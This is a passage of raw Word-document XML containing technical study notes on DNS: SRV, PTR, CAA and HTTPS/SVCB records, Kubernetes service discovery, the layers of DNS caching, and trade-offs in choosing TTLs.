      <w:r w:rsidRPr="006F072B">
        <w:t>Metadata about the zone: primary nameserver, admin email, zone serial number, timing parameters for zone transfers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D35E00" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Service Discovery Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9FE6A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SRV Record (Service):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B320F3B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F4BC2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.example.com.  300  IN  SRV  10 60 8080 server1.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A3F1A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.example.com.  300  IN  SRV  10 40 8080 server2.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A371F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.example.com.  300  IN  SRV  20  0 8080 server3.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73578F9B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Format: _service._protocol.name TTL IN SRV priority weight port target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D11B7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Priority 10</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> servers are tried before priority 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D5C3E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Within priority 10: 60% of traffic to server1, 40% to server2 (weight ratio 60:40).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50988A4B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="725"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Includes the PORT number (unlike A records which only give IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE4766" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Service discovery in microservices, SIP (VoIP), XMPP (chat), Kubernetes internal DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6405D9F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Kubernetes uses SRV records:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F879E43" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF5FC3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.my-service.my-namespace.svc.cluster.local.  30  IN  SRV  0 33 8080 pod1.my-service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E997323" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.my-service.my-namespace.svc.cluster.local.  30  IN  SRV  0 33 8080 pod2.my-service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2E180" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>_http._tcp.my-service.my-namespace.svc.cluster.local.  30  IN  SRV  0 33 8080 pod3.my-service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1D8E5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A gRPC client can query SRV records to discover all pod endpoints and load-balance across them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721AAA85" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PTR Record (Pointer / Reverse DNS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CAEB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7597B32A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>34.216.184.93.in-addr.arpa.    3600    IN    PTR    www.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C148CB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Maps IP address back to domain name. Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D127B60" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Email anti-spam (verify sending server's IP matches its claimed domain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913CD5E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Logging/diagnostics (show hostnames instead of raw IPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA7187" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="726"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Security verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A234D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CAA Record (Certificate Authority Authorization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1EC0E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B59A7A8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    3600    IN    CAA    0 issue "letsencrypt.org"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981B850" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    3600    IN    CAA    0 issuewild "letsencrypt.org"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088BE91" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Specifies which Certificate Authorities are allowed to issue certificates for this domain. Prevents unauthorized certificate issuance (mitigates MITM attacks via rogue certificates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19036A90" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Modern/Extended Record Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BDE65" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTTPS/SVCB Records (Service Binding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FA3FE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B31A8E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    300    IN    HTTPS    1 . alpn="h2,h3" ipv4hint=93.184.216.34 ipv6hint=2606:...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0EA27B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A newer record type that bundles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C5446" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The target (like CNAME but allowed at apex).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9EA8F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Supported protocols (HTTP/2, HTTP/3/QUIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A681D6E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>IP hints (avoid an extra A/AAAA query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DE89E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Port number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11BF34" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="727"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>ECH (Encrypted Client Hello) keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE10483" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A single DNS query gives the client everything it needs — IP, protocol, port, encryption keys. Eliminates multiple round trips. Enables HTTP/3 without trial-and-error discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76C82B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="4AB9A167">
          <v:rect id="_x0000_i3480" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9E465" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. DNS Caching — The Multi-Layer Cache System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC0188" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Where DNS Is Cached (and for How Long)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03AE92" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 1 — Application/Library cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D1419" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Browser: Chrome caches for up to 1 minute (or record's TTL, whichever is shorter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E08BCB5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>JVM: Default positive cache = 30s (or forever if security manager is active). Configurable via networkaddress.cache.ttl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C1305" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="728"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Go: No built-in DNS cache (resolves every time by default, but connection reuse means DNS isn't hit per request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB26130" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 2 — OS resolver cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25473506" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="729"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Linux (systemd-resolved): Caches according to TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9ED17" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="729"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>macOS (mDNSResponder): Caches with TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589950E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="729"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Windows: DNS Client service caches. ipconfig /flushdns clears it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC103E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 3 — Recursive resolver cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BED2C3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Your ISP's resolver or 8.8.8.8/1.1.1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA85EA1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Most impactful cache — shared by millions of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18430D86" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Respects TTL (mostly — some resolvers enforce minimums).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A88A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 4 — TLD and root referral cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15092046" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The recursive resolver caches TLD nameserver addresses for days (TTL 172800 = 2 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27DA59" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="731"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Root hints are essentially permanent (hard-coded in resolver software, rarely change).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F055A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 TTL Strategy — The Critical Design Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012F940" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low TTL (30–60 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F109AF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Fast failover. Change the IP, and within 60 seconds most clients see the new address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D34C0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Con:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Higher DNS query volume. More load on authoritative servers. Slightly higher latency for clients (more frequent cache misses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD69BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use when:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> You need fast failover (active-passive HA), frequent IP changes (auto-scaling), or traffic management changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE5624" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High TTL (3600–86400 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBA527" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Fewer queries to authoritative servers. Lower latency for clients (almost always cached). More resilient to authoritative server outages (clients use cached values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBAF98" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Con:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Slow propagation of changes. If your server IP changes, clients see stale records for hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C3FAD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use when:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> IPs rarely change (static infrastructure), maximum performance needed, authoritative server reliability is a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05738114" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TTL propagation problem in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B9CB4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>You set TTL=60. You change the A record from IP1 to IP2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13278753" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expected:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> All traffic moves to IP2 within 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F3E23" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FAD64" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Some resolvers ignore low TTLs (enforce minimum 300 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172BA5BB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Some corporate resolvers cache for longer (non-compliant implementations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081A698" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Java applications with default DNS caching hold the old IP indefinitely.</w:t>
